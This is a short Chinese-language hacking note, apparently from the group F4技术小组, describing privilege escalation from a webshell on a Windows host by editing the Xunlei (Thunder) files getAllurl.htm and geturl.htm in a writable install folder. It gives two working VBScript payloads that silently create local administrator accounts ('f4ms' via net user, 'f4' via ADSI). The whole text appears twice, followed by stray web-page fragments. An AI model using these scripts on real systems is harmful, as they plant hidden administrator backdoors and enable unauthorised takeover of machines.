F4技术小组 www.f4ms.net
webshell地址
http://192.168.197.130/dama.asp
迅雷默认安装文件夹
盘符\Program Files\Thunder Network\Thunder
盘符\Program Files\Thunder
要修改的两个文件
进入Program文件夹
getAllurl.htm
geturl.htm
条件,目录可写
提权脚本
<script language="vbscript">
set vbs=createobject("wscript.shell")
vbs.run "cmd /c net user f4ms f4ms /add",0
vbs.run "cmd /c net localgroup administrators f4ms /add",0
</script>
<script language="vbscript">
set wsnetwork=CreateObject("WSCRIPT.NETWORK")
os="WinNT://"&wsnetwork.ComputerName
Set ob=GetObject(os)
Set oe=GetObject(os&"/Administrators,group")
Set od=ob.Create("user","f4")
od.SetPassword "f4"
od.SetInfo
Set of=GetObject(os&"/f4",user)
oe.add os&"/f4"
</script>
上方的是NET提权
下方的是VBS提权
webshell地址
http://192.168.197.130/dama.asp
迅雷默认安装文件夹
盘符\Program Files\Thunder Network\Thunder
盘符\Program Files\Thunder
要修改的两个文件
进入Program文件夹
getAllurl.htm
geturl.htm
条件,目录可写
提权脚本
<script language="vbscript">
set vbs=createobject("wscript.shell")
vbs.run "cmd /c net user f4ms f4ms /add",0
vbs.run "cmd /c net localgroup administrators f4ms /add",0
</script>
<script language="vbscript">
set wsnetwork=CreateObject("WSCRIPT.NETWORK")
os="WinNT://"&wsnetwork.ComputerName
Set ob=GetObject(os)
Set oe=GetObject(os&"/Administrators,group")
Set od=ob.Create("user","f4")
od.SetPassword "f4"
od.SetInfo
Set of=GetObject(os&"/f4",user)
oe.add os&"/f4"
</script>
上方的是NET提权
下方的是VBS提权
1万+
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
